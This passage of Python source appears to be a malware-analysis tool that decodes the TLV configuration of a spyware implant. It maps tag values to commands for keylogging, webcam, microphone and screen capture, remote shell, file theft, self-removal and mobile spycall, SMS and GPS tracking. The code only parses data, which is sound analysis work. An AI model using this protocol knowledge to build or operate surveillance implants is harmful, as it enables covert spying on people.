1328768: "TlvTypeSkypeChatID",
1329024: "TlvTypeSkypeSenderAccountName",
1329280: "TlvTypeSkypeSenderDisplayName",
1329536: "TlvTypeSkypeIncoming",
1329792: "TlvTypeSkypeSessionType",
1192096: "TlvTypeGetKeyloggerConfigRequest",
1192352: "TlvTypeKeyloggerConfigReply",
1192608: "TlvTypeSetKeyloggerConfigRequest",
1180064: "TlvTypeStartKeyLoggingRequest",
1180320: "TlvTypeStartKeyLoggingReply",
1180576: "TlvTypeKeyLoggingFrame",
1180832: "TlvTypeStopKeyLoggingRequest",
1181088: "TlvTypeKeyLoggingStoppedReply",
1196416: "TlvTypeKLFrameData",
1126560: "TlvTypeGetVideoConfigRequest",
1126816: "TlvTypeVideoConfigReply",
1127072: "TlvTypeSetVideoConfigRequest",
1114528: "TlvTypeStartScreenRequest",
1114784: "TlvTypeStartScreenReply",
1115040: "TlvTypeScreenFrame",
1115296: "TlvTypeStopScreenRequest",
1115552: "TlvTypeScreenStoppedReply",
1115808: "TlvTypeStartScreenRecording",
1122720: "TlvTypeStartWebCamRequest",
1122976: "TlvTypeStartWebCamReply",
1123232: "TlvTypeWebCamFrame",
1123488: "TlvTypeStopWebCamRequest",
1123744: "TlvTypeWebCamStoppedReply",
1124000: "TlvTypeStartWebCamRecording",
1130560: "TlvTypeVDFrameID",
1130896: "TlvTypeVDFrameData",
1131136: "TlvTypeOriginalVideoResolution",
1131392: "TlvTypeVideoResolution",
1066112: "TlvTypeVideoSessionType",
1066368: "TlvTypeVideoEncodingType",
1132160: "TlvTypeAutomaticRecordingUID",
1061024: "TlvTypeGetAudioConfigRequest",
1061280: "TlvTypeAudioConfigReply",
1061536: "TlvTypeSetAudioConfigRequest",
1048992: "TlvTypeStartMicrophoneRequest",
1049248: "TlvTypeStartMicrophoneReply",
1049504: "TlvTypeMicrophoneFrame",
1049760: "TlvTypeStopMicrophoneRequest",
1050016: "TlvTypeMicrophoneStoppedReply",
1050272: "TlvTypeStartMicrophoneRecording",
1052736: "TlvTypeMICFrameID",
1053072: "TlvTypeMICFrameData",
1053312: "TlvTypeAudioSessionType",
1053568: "TlvTypeAudioEncodingType",
328096: "TlvTypeGetSchedulerConfigRequest",
328352: "TlvTypeSchedulerConfigReply",
328608: "TlvTypeSetSchedulerConfigRequest",
331920: "TlvTypeSchedulerTask",
332192: "TlvTypeSchedulerTaskRecordByTime",
332448: "TlvTypeSchedulerTaskRecordScreenWhenAppRuns",
332704: "TlvTypeSchedulerTaskRecordMicWhenAppUsesIt",
332960: "TlvTypeSchedulerTaskRecordWebCamWhenAppUsesIt",
360592: "TlvTypeSCHTaskConfiguration",
360752: "TlvTypeSCHTaskEnabled",
361344: "TlvTypeSCHTaskStartDateTime",
361600: "TlvTypeSCHTaskStopDateTime",
362112: "TlvTypeSCHApplicationName",
362288: "TlvTypeSCHApplicationWindowOnly",
299168: "TlvTypeGetCmdLineConfigRequest",
299424: "TlvTypeCmdLineConfigReply",
299680: "TlvTypeSetCmdLineConfigRequest",
262560: "TlvTypeStartCmdLineSessionRequest",
262816: "TlvTypeStartCmdLineSessionReply",
263072: "TlvTypeStopCmdLineSessionRequest",
263328: "TlvTypeCmdLineSessionStoppedReply",
263584: "TlvTypeCmdLineExecute",
263840: "TlvTypeCmdLineExecutionResult",
266352: "TlvTypeCmdLineExecuteCommand",
266560: "TlvTypeCmdLineExecuteAnswerID",
266864: "TlvTypeCmdLineExecuteAnswerData",
168096: "TlvTypeGetFileSystemConfigRequest",
168352: "TlvTypeFileSystemConfigReply",
168608: "TlvTypeSetFileSystemConfigRequest",
131488: "TlvTypeGetAllDrivesRequest",
131744: "TlvTypeGetAllDrivesReply",
135328: "TlvTypeGetFolderContentsRequest",
135584: "TlvTypeGetFolderContentsReply",
135840: "TlvTypeGetFolderContentsNext",
136096: "TlvTypeGetFolderContentsEnd",
139424: "TlvTypeDownloadFileRequest",
139680: "TlvTypeCancelDownloadFileRequest",
139936: "TlvTypeDownloadFileReply",
140192: "TlvTypeDownloadFileNext",
140448: "TlvTypeDownloadFileEnd",
140704: "TlvTypeCancelDownloadFileReply",
143520: "TlvTypeUploadFileRequest",
143776: "TlvTypeCancelUploadFileRequest",
144032: "TlvTypeUploadFileReply",
144288: "TlvTypeUploadFileNext",
144544: "TlvTypeUploadFileEnd",
144800: "TlvTypeUploadFileCompleted",
145056: "TlvTypeCancelUploadFileReply",
147616: "TlvTypeDeleteFileRequest",
147872: "TlvTypeDeleteFileReply",
151968: "TlvTypeSearchFileRequest",
152224: "TlvTypeSearchFileReply",
152480: "TlvTypeSearchFileNext",
152736: "TlvTypeSearchFileEnd",
152992: "TlvTypeCancelSearchFileRequest",
153248: "TlvTypeCancelSearchFileReply",
159888: "TlvTypeFSFileDataChunk",
160128: "TlvTypeFSDiskDrive",
160384: "TlvTypeFSFullPath",
160640: "TlvTypeFSFilename",
160896: "TlvTypeFSFileExtension",
161088: "TlvTypeFSDiskDriveType",
161408: "TlvTypeFSFileSize",
161584: "TlvTypeFSIsFolder",
161840: "TlvTypeFSReadOnly",
162096: "TlvTypeFSHidden",
162352: "TlvTypeFSSystem",
162688: "TlvTypeFSFileCreationTime",
162944: "TlvTypeFSFileLastAccessTime",
163200: "TlvTypeFSFileLastWriteTime",
163472: "TlvTypeFSFullPathM",
8978848: "TlvTypeMasterMobileTargetConn",
7471520: "TlvTypeMasterTargetConn",
7405984: "TlvTypeMasterAgentLogin",
7406240: "TlvTypeMasterAgentLoginAnswer",
7406752: "TlvTypeMasterAgentTargetList",
7407008: "TlvTypeMasterAgentTargetOnlineList",
7407264: "TlvTypeMasterAgentTargetInfoReply",
7407520: "TlvTypeMasterAgentUserList",
7407776: "TlvTypeMasterAgentUserListReply",
7408032: "TlvTypeMasterAgentTargetArchivedList",
7408288: "TlvTypeMasterAgentTargetListEx",
7408544: "TlvTypeMasterAgentTargetOnlineListEx",
7408800: "TlvTypeMasterAgentMobileTargetArchivedList",
7409056: "TlvTypeMasterAgentMobileTargetList",
7409312: "TlvTypeMasterAgentMobileTargetOnlineList",
7409824: "TlvTypeMasterAgentQueryFirst",
7410080: "TlvTypeMasterAgentQueryNext",
7410336: "TlvTypeMasterAgentQueryLast",
7410592: "TlvTypeMasterAgentQueryAnswer",
7410848: "TlvTypeMasterAgentRemoveRecord",
7411104: "TlvTypeMasterAgentTargetInfoExReply",
7411344: "TlvTypeTargetInfoExProperty",
7411616: "TlvTypeTargetInfoExPropertyValue",
7411840: "TlvTypeTargetInfoExPropertyValueName",
7411968: "TlvTypeTargetInfoExPropertyValueData",
7412384: "TlvTypeMasterAgentAlarm",
7413920: "TlvTypeMasterAgentRetrieveData",
7414176: "TlvTypeMasterAgentRetrieveDataAnswer",
7414432: "TlvTypeMasterAgentRemoveUser",
7414688: "TlvTypeMasterAgentRemoveTarget",
7414944: "TlvTypeMasterAgentRetrieveDataComments",
7415200: "TlvTypeMasterAgentUpdateDataComments",
7415712: "TlvTypeMasterAgentRetrieveActivityLogging",
7415968: "TlvTypeMasterAgentRetrieveMasterLogging",
7416224: "TlvTypeMasterAgentRetrieveAgentActivityLogging",
7417248: "TlvTypeMasterAgentSendUserGUIConfig",
7417504: "TlvTypeMasterAgentGetUserGUIConfigRequest",
7417760: "TlvTypeMasterAgentGetUserGUIConfigReply",
7418016: "TlvTypeMasterAgentProxyList",
7418272: "TlvTypeMasterAgentProxyInfoReply",
7419040: "TlvTypeMasterAgentNameValuePacket",
7419248: "TlvTypeMasterAgentValueName",
7419392: "TlvTypeMasterAgentValueData",
7419808: "TlvTypeMasterAgentRetrieveTargetHistory",
7421088: "TlvTypeMasterAgentInstallMasterLicense",
7421344: "TlvTypeMasterAgentInstallSoftwareUpdate",
7421600: "TlvTypeMasterAgentInstallSoftwareUpdateChunk",
7421856: "TlvTypeMasterAgentInstallSoftwareUpdateDone",
7422112: "TlvTypeMasterAgentSoftwareUpdateInfo",
7422368: "TlvTypeMasterAgentSoftwareUpdateInfoReply",
7422624: "TlvTypeMasterAgentSoftwareUpdate",
7422880: "TlvTypeMasterAgentSoftwareUpdateReply",
7423136: "TlvTypeMasterAgentSoftwareUpdateNext",
7423392: "TlvTypeMasterAgentAddTimeSchedule",
7423648: "TlvTypeMasterAgentAddScreenSchedule",
7423904: "TlvTypeMasterAgentAddLockedSchedule",
7424160: "TlvTypeMasterAgentRemoveSchedule",
7424416: "TlvTypeMasterAgentGetSchedulerList",
7424672: "TlvTypeMasterAgentSchedulerTimeAction",
7424928: "TlvTypeMasterAgentSchedulerScreenAction",
7425184: "TlvTypeMasterAgentSchedulerLockedAction",
7425440: "TlvTypeMasterAgentProjectSoftwareUpdateInfo",
7425696: "TlvTypeMasterAgentProjectSoftwareUpdateInfoReply",
7425952: "TlvTypeMasterAgentProjectSoftwareUpdate",
7426112: "TlvTypeMasterAgentSchedulerID",
7426368: "TlvTypeMasterAgentSchedulerStartTime",
7426624: "TlvTypeMasterAgentSchedulerStopTime",
7427488: "TlvTypeMasterAgentAddRecordedDataAvailableSchedule",
7427744: "TlvTypeMasterAgentSchedulerRecordedDataAvailableAction",
7428256: "TlvTypeMasterAgentRetrieveRemoteMasterData",
7428512: "TlvTypeMasterAgentRetrieveRemoteMasterDataReply",
7428768: "TlvTypeMasterAgentDeleteRemoteMasterData",
7429024: "TlvTypeMasterAgentRetrieveOfflineMasterData",
7429280: "TlvTypeMasterAgentRetrieveOfflineMasterDataReply",
7429536: "TlvTypeMasterAgentDeleteOfflineMasterData",
7430304: "TlvTypeMasterAgentQueryFirstEx",
7430560: "TlvTypeMasterAgentQueryNextEx",
7430816: "TlvTypeMasterAgentQueryLastEx",
7431072: "TlvTypeMasterAgentQueryAnswerEx",
7431328: "TlvTypeMasterAgentSendUserPreferences",
7431584: "TlvTypeMasterAgentGetUserPreferencesRequest",
7431840: "TlvTypeMasterAgentGetUserPreferencesReply",
7432096: "TlvTypeMasterAgentListMCFilesRequest",
8415392: "TlvTypeMasterAgentListMCFilesReply",
7432608: "TlvTypeMasterAgentDeleteMCFiles",
7432864: "TlvTypeMasterAgentSendMCFiles",
7433120: "TlvTypeMasterAgentMCStatisticsRequest",
7433376: "TlvTypeMasterAgentMCStatisticsReply",
7433616: "TlvTypeMasterAgentMCStatisticsValues",
7434400: "TlvTypeMasterAgentTrojanKeyRequest",
7434656: "TlvTypeMasterAgentTrojanKeyReply",
7434912: "TlvTypeMasterAgentEvProtectionX509Request",
7435168: "TlvTypeMasterAgentEvProtectionX509Reply",
7435424: "TlvTypeMasterAgentEvProtectionImportCert",
7435680: "TlvTypeMasterAgentEvProtectionImportCertCompleted",
7435936: "TlvTypeMasterAgentConfigurationRequest",
7436192: "TlvTypeMasterAgentConfigurationReply",
7436448: "TlvTypeMasterAgentConfigurationUpdateRequest",
7436704: "TlvTypeMasterAgentConfigurationUpdateRequestCompleted",
7436944: "TlvTypeMasterAgentConfiguration",
7437216: "TlvTypeMasterAgentConfigurationValue",
7437424: "TlvTypeMasterAgentConfigurationValueName",
7437568: "TlvTypeMasterAgentConfigurationValueData",
7437984: "TlvTypeMasterAgentConfigurationTransferDone",
7438496: "TlvTypeMasterAgentRetrieveTargetFile",
7438752: "TlvTypeMasterAgentRetrieveTargetFileAnswer",
7438912: "TlvTypeMasterAgentAlarmEntryID",
7439168: "TlvTypeMasterAgentAlarmEntryVersion",
7439424: "TlvTypeMasterAgentAlarmTriggerFlags",
7439776: "TlvTypeMasterAgentGetAlarmList",
7440032: "TlvTypeMasterAgentAddAlarmEntry",
7440288: "TlvTypeMasterAgentRemoveAlarmEntry",
7440544: "TlvTypeMasterAgentAlarmEntry",
7440800: "TlvTypeMasterAgentSystemStatus",
7441056: "TlvTypeMasterAgentSystemStatusRequest",
7441312: "TlvTypeMasterAgentSystemStatusReply",
7441552: "TlvTypeMasterAgentLicenseValues",
7441824: "TlvTypeMasterAgentLicenseValuesRequest",
7442080: "TlvTypeMasterAgentLicenseValuesReply",
7442592: "TlvTypeMasterAgentGetNetworkConfigurationRequest",
7442848: "TlvTypeMasterAgentSetNetworkConfigurationRequest",
7443104: "TlvTypeMasterAgentSetNetworkConfigurationReply",
7443360: "TlvTypeMasterAgentRetrieveAllowedModulesList",
7443616: "TlvTypeMasterAgentRetrieveAllowedModulesListAnswer",
7446688: "TlvTypeMasterAgentRemoveAllTargetData",
7446944: "TlvTypeMasterAgentForceDownloadRecordedData",
7447200: "TlvTypeMasterAgentTargetCreateNotification",
7447456: "TlvTypeMasterAgentMobileTargetInfoReply",
7447696: "TlvTypeMasterAgentMobileTargetInfoValues",
7450784: "TlvTypeMasterAgentAlert",
7454880: "TlvTypeMasterAgentAddUser",
7455392: "TlvTypeMasterAgentAddUserReply",
7455648: "TlvTypeMasterAgentModifyUser",
7455904: "TlvTypeMasterAgentSetUserPermission",
7456160: "TlvTypeMasterAgentSetTargetPermission",
7456400: "TlvTypeMasterAgentUserPermission",
7456656: "TlvTypeMasterAgentTargetPermission",
7456928: "TlvTypeMasterAgentUserPermissionValuePacket",
7457184: "TlvTypeMasterAgentTargetPermissionValuePacket",
7457344: "TlvTypeMasterAgentUserPermissionValueName",
7457600: "TlvTypeMasterAgentTargetPermissionValueName",
7457856: "TlvTypeMasterAgentUserPermissionValueData",
7458112: "TlvTypeMasterAgentTargetPermissionValueData",
7458464: "TlvTypeMasterAgentModifyPassword",
7458656: "TlvTypeMasterAgentMobileTargetPermissionValueName",
7458976: "TlvTypeMasterAgentUploadFile",
7459232: "TlvTypeMasterAgentUploadFileChunk",
7459488: "TlvTypeMasterAgentUploadFileDone",
7459744: "TlvTypeMasterAgentUploadFilesTransferDone",
7460000: "TlvTypeMasterAgentGetTargetModuleConfigRequest",
7460256: "TlvTypeMasterAgentRemoveFile",
7460512: "TlvTypeMasterAgentMobileProxyList",
7460768: "TlvTypeMasterAgentSMSProxyList",
7461024: "TlvTypeMasterAgentSMSProxyInfoReply",
7461280: "TlvTypeMasterAgentCallPhoneNumberList",
7461536: "TlvTypeMasterAgentCallPhoneNumberInfoReply",
7461792: "TlvTypeMasterAgentGetMobileTargetModuleConfigRequest",
7462048: "TlvTypeMasterAgentSendSMS",
7469984: "TlvTypeMasterAgentEncryptionRequired",
7470752: "TlvTypeAgentMasterComm",
7470240: "TlvTypeMasterAgentFileCompleted",
7470496: "TlvTypeMasterAgentRequestCompleted",
7471008: "TlvTypeMasterAgentRequestStatus",
7733664: "TlvTypeRelayProxyComm",
8454800: "TlvTypeRelayData",
7734176: "TlvTypeRelayDummyHeartbeat",
7668128: "TlvTypeMasterTargetComm",
7668384: "TlvTypeTargetCloseAllLiveStreaming",
7471424: "TlvTypeProxyMasterCommSig",
7471776: "TlvTypeProxyMasterComm",
7472032: "TlvTypeMasterProxyComm",
7472288: "TlvTypeProxyMasterHeartBeatAnswer",
7472544: "TlvTypeProxyMasterDisconnect",
7472704: "TlvTypeProxyMasterNotification",
7473056: "TlvTypeProxyMasterRequest",
7473312: "TlvTypeMasterProxyCommNotification",
7473568: "TlvTypeMasterCheckTargetDisconnect",
7536960: "TlvTypeProxyTargetCommSig",
7537312: "TlvTypeProxyTargetComm",
7537568: "TlvTypeProxyMasterTargetComm",
7537728: "TlvTypeProxyTargetRequestCrypto",
7538064: "TlvTypeProxyTargetAnswerCrypto",
8454544: "TlvTypeProxyData",
8458400: "TlvTypeProxyTargetDisconnect",
8458656: "TlvTypeProxyMobileTargetDisconnect",
8458912: "TlvTypeProxyDummyHeartbeat",
8459168: "TlvTypeProxyMobileDummyHeartbeat",
8585616: "TlvTypeAgentData",
8585808: "TlvTypeAgentQueryID",
8586048: "TlvTypeAgentQueryModSubmodID",
8586304: "TlvTypeAgentQueryFromDate",
8586560: "TlvTypeAgentQueryToDate",
8586816: "TlvTypeAgentQuerySortOrder",
8587136: "TlvTypeAgentQueryValueFilter",
8587328: "TlvTypeAgentUID",
8520080: "TlvTypeMasterData",
8520768: "TlvTypeMasterMode",
8521024: "TlvTypeMasterToken",
8521344: "TlvTypeMasterQueryResult",
8522368: "TlvTypeMasterAlarmString",
8651152: "TlvTypeMobileTargetData",
8651376: "TlvTypeMobileTargetHeartBeatV10",
8651632: "TlvTypeMobileTargetExtendedHeartBeatV10",
8651888: "TlvTypeMobileHeartBeatReplyV10",
8653472: "TlvTypeMobileInstalledModulesReply",
8656032: "TlvTypeMobileTargetUploadModuleRequest",
8656288: "TlvTypeMobileTargetUploadModuleReply",
8656544: "TlvTypeMobileTargetUploadModuleChunk",
8656800: "TlvTypeMobileTargetUploadModuleDoneRequest",
8657056: "TlvTypeMobileTargetUploadModuleDoneReply",
8657312: "TlvTypeMobileTargetRemoveModuleRequest",
8657568: "TlvTypeMobileTargetRemoveModuleReply",
8655008: "TlvTypeMobileTargetOfflineUploadModuleRequest",
8657824: "TlvTypeMobileTargetOfflineUploadModuleReply",
8658080: "TlvTypeMobileTargetOfflineUploadModuleChunk",
8658336: "TlvTypeMobileTargetOfflineUploadModuleDoneRequest",
8658592: "TlvTypeMobileTargetOfflineUploadModuleDoneReply",
8658848: "TlvTypeMobileTargetOfflineError",
8659104: "TlvTypeMobileTargetError",
8659360: "TlvTypeMobileTargetGetRecordedFilesRequest",
8659616: "TlvTypeMobileTargetRecordedFilesReply",
8659872: "TlvTypeMobileTargetRecordedFileDownloadRequest",
8660128: "TlvTypeMobileTargetRecordedFileDownloadReply",
8660384: "TlvTypeMobileTargetRecordedFileDownloadChunk",
8660640: "TlvTypeMobileTargetRecordedFileDownloadCompleted",
8660896: "TlvTypeMobileTargetRecordedFileDeleteRequest",
8661152: "TlvTypeMobileTargetRecordedFileDeleteReply",
8663968: "TlvTypeMobileTargetOfflineConfig",
8664224: "TlvTypeMobileTargetEmergencyConfigAsTLV",
8664432: "TlvTypeMobileTargetEmergencyConfig",
8671392: "TlvTypeMobileTargetLoadModuleRequest",
8671648: "TlvTypeMobileTargetLoadModuleReply",
8671904: "TlvTypeMobileTargetUnLoadModuleRequest",
8672160: "TlvTypeMobileTargetUnLoadModuleReply",
8675472: "TlvTypeMobileTargetHeartbeatEvents",
8675648: "TlvTypeMobileTargetHeartbeatInterval",
8675984: "TlvTypeMobileTargetHeartbeatRestrictions",
8676208: "TlvTypeConfigSMSPhoneNumber",
8676496: "TlvTypeMobileTargetPositioning",
8676672: "TlvTypeMobileTrojanUID",
8676976: "TlvTypeMobileTrojanID",
8677296: "TlvTypeMobileTargetLocationChangedRange",
8677440: "TlvTypeConfigMobileAutoRemovalDateTime",
8677808: "TlvTypeConfigOverwriteProxyAndPhones",
8678000: "TlvTypeConfigCallPhoneNumber",
8679488: "TlvTypeLocationAreaCode",
8679744: "TlvTypeCellID",
8680048: "TlvTypeMobileCountryCode",
8680304: "TlvTypeMobileNetworkCode",
8680560: "TlvTypeIMSI",
8680816: "TlvTypeIMEI",
8681072: "TlvTypeGPSLatitude",
8681328: "TlvTypeGPSLongitude",
8681520: "TlvTypeFirstHeartbeat",
8681872: "TlvTypeInstalledModules",
8683568: "TlvTypeValidGPSValues",
8389008: "TlvTypeTargetData",
8389280: "TlvTypeTargetHeartBeat",
8389680: "TlvTypeTargetKeepSessionAlive",
8390000: "TlvTypeTargetLocalIP",
8390256: "TlvTypeTargetGlobalIP",
8390448: "TlvTypeTargetState",
8390784: "TlvTypeTargetID",
8391072: "TlvTypeGetInstalledModulesRequest",
8391328: "TlvTypeInstalledModulesReply",
8391488: "TlvTypeTrojanUID",
8391808: "TlvTypeTrojanID",
8392000: "TlvTypeTrojanMaxInfections",
8392240: "TlvTypeScreenSaverOn",
8392496: "TlvTypeScreenLocked",
8392752: "TlvTypeRecordedDataAvailable",
8393024: "TlvTypeDownloadedRecordedDataTimeStamp",
8393280: "TlvTypeInstallationMode",
8393552: "TlvTypeTargetRemoveNotification",
8393792: "TlvTypeTargetPlatformBits",
8394032: "TlvTypeRemoveItselfMaxInfectionReached",
8394288: "TlvTypeRemoveItselfAtMasterRequest",
8394544: "TlvTypeRemoveItselfAtAgentRequest",
8394912: "TlvTypeRemoveItselfAtAgentReqRequest",
8395072: "TlvTypeRecordedFilesDownloadTotal",
8395328: "TlvTypeRecordedFilesDownloadProgress",
8395632: "TlvTypeTargetLicenseInfo",
8395840: "TlvTypeRemoveTargetLicenseInfo",
8396176: "TlvTypeTargetAllConfigurations",
8396960: "TlvTypeTargetError",
8401056: "TlvTypeGetTargetConfigRequest",
8401312: "TlvTypeTargetConfigReply",
8401568: "TlvTypeSetTargetConfigRequest",
8402304: "TlvTypeConfigTargetID",
8402496: "TlvTypeConfigTargetHeartbeatInterval",
8402800: "TlvTypeConfigTargetProxy",
8403008: "TlvTypeConfigTargetPort",
8403584: "TlvTypeConfigAutoRemovalDateTime",
8403776: "TlvTypeConfigAutoRemovalIfNoProxy",
8404032: "TlvTypeInternalAutoRemovalElapsedTime",
8405040: "TlvTypeConfigActiveHiding",
8409248: "TlvTypeTargetLoadModuleRequest",
8409504: "TlvTypeTargetLoadModuleReply",
8409760: "TlvTypeTargetUnLoadModuleRequest",
8410016: "TlvTypeTargetUnLoadModuleReply",
8410272: "TlvTypeTargetUploadModuleRequest",
8410528: "TlvTypeTargetUploadModuleReply",
8410784: "TlvTypeTargetUploadModuleChunk",
8411040: "TlvTypeTargetUploadModuleDoneRequest",
8411296: "TlvTypeTargetUploadModuleDoneReply",
8411552: "TlvTypeTargetRemoveModuleRequest",
8411808: "TlvTypeTargetRemoveModuleReply",
8412064: "TlvTypeTargetOfflineUploadModuleRequest",
8412320: "TlvTypeTargetOfflineUploadModuleReply",
8412576: "TlvTypeTargetOfflineUploadModuleChunk",
8412832: "TlvTypeTargetOfflineUploadModuleDoneRequest",
8413088: "TlvTypeTargetOfflineUploadModuleDoneReply",
8413344: "TlvTypeTargetOfflineError",
8413600: "TlvTypeTargetUploadError",
8417440: "TlvTypeTargetGetRecordedFilesRequest",
8417696: "TlvTypeTargetRecordedFilesReply",
8417952: "TlvTypeTargetRecordedFileDownloadRequest",
8418208: "TlvTypeTargetRecordedFileDownloadReply",
8418464: "TlvTypeTargetRecordedFileDownloadChunk",
8418720: "TlvTypeTargetRecordedFileDownloadCompleted",
8418976: "TlvTypeTargetRecordedFileDeleteRequest",
8419232: "TlvTypeTargetRecordedFileDeleteReply",
8419488: "TlvTypeTargetGetRecordedFilesRequestEx",
8419744: "TlvTypeTargetRecordedFilesReplyEx",
8420000: "TlvTypeTargetRecordedFileDeleteRequestEx",
8420256: "TlvTypeTargetRecordedFilesDownloadRequestEx",
16744768: "TlvTypeProxyConnectionBroken",
16712000: "TlvTypeTargetConnectionBroken",
16712256: "TlvTypeAgentConnectionBroken",
16712512: "TlvTypeTargetOffline",
16646544: "TlvTypePlaintext",
16646800: "TlvTypeCompression",
16647056: "TlvTypeEncryption",
16647232: "TlvTypeTargetUID",
16647536: "TlvTypeIPAddress",
16647808: "TlvTypeUserName",
16648064: "TlvTypeComputerName",
16648304: "TlvTypeLoginName",
16648560: "TlvTypePassphrase",
16648832: "TlvTypeRecordID",
16649088: "TlvTypeOwner",
16649344: "TlvTypeMetaData",
16649536: "TlvTypeModuleID",
16649856: "TlvTypeOSName",
16650048: "TlvTypeModuleSubID",
16650320: "TlvTypeErrorCode",
16650560: "TlvTypeOffset",
16650816: "TlvTypeLength",
16651088: "TlvTypeRequestID",
16651328: "TlvTypeRequestType",
16651584: "TlvTypeVersion",
16651840: "TlvTypeMachineID",
16652096: "TlvTypeMajorNumber",
16652352: "TlvTypeMinorNumber",
16652656: "TlvTypeGlobalIPAddress",
16652912: "TlvTypeASCII_Filename",
16653120: "TlvTypeFilesize",
16653392: "TlvTypeFilecount",
16653712: "TlvTypeFiledata",
16653968: "TlvTypeMD5Sum",
16654144: "TlvTypeProxyPort",
16654400: "TlvTypeStatus",
16654656: "TlvTypeUserID",
16654912: "TlvTypeGroupID",
16655168: "TlvTypePermissions",
16655424: "TlvTypeRequestCode",
16655680: "TlvTypeDataSize",
16655936: "TlvTypeKeyType",
16656240: "TlvTypeEmail",
16656432: "TlvTypeEnabled",
16656688: "TlvTypeLicensed",
16656960: "TlvTypeAudioFrequency",
16657216: "TlvTypeAudioBitsPerSample",
16657472: "TlvTypeAudioChannels",
16657728: "TlvTypeStartTime",
16657984: "TlvTypeStopTime",
16658240: "TlvTypeBitMask",
16658560: "TlvTypeTimeZone",
16658816: "TlvTypeDateTime",
16659072: "TlvTypeStartSessionDateTime",
16659328: "TlvTypeStopSessionDateTime",
16659520: "TlvTypeDateTimeRef",
16659776: "TlvTypeScheduleRepeat",
16660032: "TlvTypeUnixMasterDateTime",
16660288: "TlvTypeUnixUTCDateTime",
16660544: "TlvTypeDurationInSeconds",
16660864: "TlvTypeMasterRefTime",
16661120: "TlvTypeMasterRefTimeStart",
16661376: "TlvTypeMasterRefTimeEnd",
16661568: "TlvTypeCounter",
16661888: "TlvTypeWhiteListEntry",
16662144: "TlvTypeBlackListEntry",
16662336: "TlvTypeBlackWhiteListingMode",
16662576: "TlvTypeConfigEnabled",
16662848: "TlvTypeConfigMaxRecordingSize",
16663104: "TlvTypeConfigAudioQuality",
16663344: "TlvTypeConfigVideoBlackAndWhite",
16663616: "TlvTypeConfigVideoResolution",
16663872: "TlvTypeConfigCaptureFrequency",
16664128: "TlvTypeConfigVideoQuality",
16664384: "TlvTypeConfigFilesStandardFilter",
16664704: "TlvTypeConfigFilesCustomFilter",
16664896: "TlvTypeConfigStandardLocation",
16665216: "TlvTypeConfigCustomLocation",
16665408: "TlvTypeConfigFileChunkSize",
16665664: "TlvTypeConfigFileTransferSpeed",
16665904: "TlvTypeConfigUploadFileOverwrite",
16666160: "TlvTypeConfigDeleteOverReboot",
16666496: "TlvTypeConfigCustomLocationException",
16666752: "TlvTypeExtraData",
16667008: "TlvTypeSignature",
16667264: "TlvTypeComments",
16667520: "TlvTypeDescription",
16667776: "TlvTypeFilenameExtension",
16668032: "TlvTypeSessionType",
16668224: "TlvTypePeriod",
16668512: "TlvTypeMobileTargetUID",
16668784: "TlvTypeMobileTargetID",
16669072: "TlvTypeMobilePlaintext",
16669328: "TlvTypeMobileCompression",
16669584: "TlvTypeMobileEncryption",
16669824: "TlvTypeEncodingType",
16670576: "TlvTypePhoneNumber",
16670784: "TlvTypeConfigCustomLocationMode",
16674928: "TlvTypeNetworkInterface",
16675136: "TlvTypeNetworkInterfaceMode",
16675440: "TlvTypeNetworkInterfaceAddress",
16675696: "TlvTypeNetworkInterfaceNetmask",
16675952: "TlvTypeNetworkInterfaceGateway",
16676208: "TlvTypeNetworkInterfaceDNS_1",
16676464: "TlvTypeNetworkInterfaceDNS_2",
16677440: "TlvTypeLoginTime",
16677696: "TlvTypeLogoffTime",
16678720: "TlvTypeGeneric_Type",
16678976: "TlvTypeChecksum",
16679280: "TlvTypeCity",
16679536: "TlvTypeCountry",
16679792: "TlvTypeCountryCode",
16683072: "TlvTypeTargetType",
16683392: "TlvTypeDurationString",
8257792: "TlvTypeTestMetaTypeInvalid",
8258608: "TlvTypeTestMetaTypeBool",
8258880: "TlvTypeTestMetaTypeUInt",
8259152: "TlvTypeTestMetaTypeInt",
8259440: "TlvTypeTestMetaTypeString",
8259712: "TlvTypeTestMetaTypeUnicode",
8259984: "TlvTypeTestMetaTypeRaw",
8260256: "TlvTypeTestMetaTypeGroup",
8260416: "TlvTypeTestMemberIdentifier",
8260736: "TlvTypeTestMemberName",
0x2331a0: "TlvTypeVideoConfigReply", # Guess based on module
0x2431a0: "TlvTypeScreenRecordingConfigReply", # Guess
0x2731a0: "TlvTypeEmailConfigReply", # Guess
0x2831a0: "TlvTypeWifiConfigReply", # Guess
0x2931a0: "TlvTypeRemoteConfigReply", #Guess
}
NEED_RECURSION = ["TlvTypeChangedConfigReply", "TlvTypeTargetConfigReply",
"TlvTypeFileSystemConfigReply", "TlvTypeCmdLineConfigReply",
"TlvTypeSchedulerConfigReply", "TlvTypeMobileTargetOfflineConfig",
"TlvTypeMobileTrackingConfigRaw", "TlvTypeMobileTrackingConfig",
"0x544090", "0x5440a0", "0x534090", "0x5341a0"]
def decode(m):
cfg = {}
while m.b.tell() < m._len:
size = m.dword()
tag = m.dword()
tag_type = (tag & 0xf0) >> 4
name = tlv_types.get(tag)
if tag_type < 4:
data = m.byte()
elif tag_type >= 6:
data = m.read(size - 8)
if tag_type == 8:
data = data.decode('utf-16')
if u"\u0380" in data:
category, rest = data.split(u"\u0380")
data = {'category': category, 'list': rest.split(u"\u0381")}
else:
data = m.dword()
if not name:
name = hex(tag)
if name in NEED_RECURSION or "ConfigReply" in name:
nm = M(data)
cfg[name] = decode(nm)
elif name in cfg and type(cfg[name]) != list:
olv = cfg[name]
cfg[name] = [olv, data]
elif name in cfg and type(cfg[name]) == list:
cfg[name].append(data)
elif name == "TlvTypeInstalledModules":
# Specific decoding for Android modules
olv = {"data": data}
olv["logging"] = (data[68] == 1)
olv["spycall"] = (data[64] == 1)
olv["call_interception"] = (data[65] == 1)
olv["sms"] = (data[66] == 1)
olv["addressbook"] = (data[67] == 1)
olv["tracking"] = (data[69] == 1)
olv["phonelogs"] = (data[70] == 1)
cfg[name] = olv
else:
cfg[name] = data
return cfg
class MyEncoder(JSONEncoder):
"""
JSON encoder to encode bytes
"""
def default(self, o):
if isinstance(o, bytes):
try:
return o.decode('utf-8')
except UnicodeDecodeError:
return repr(o)
return o
# From https://github.com/mak/mlib
class M(object):
TRANSL = {'byte': ('B', 1), 'word': ('H', 2),
'dword': ('I', 4), 'qword': ('Q', 8)}
def __init__(self, d, end_fmt=''):
self._len = len(d)
self.b = BytesIO(d)
def _get_bytes(self, fmt, s, off):
return struct.unpack(fmt, self.read(off, s) if off else self.read(s))[0]
def skip(self, n):
self.b.seek(n, os.SEEK_CUR)
def unskip(self, n):
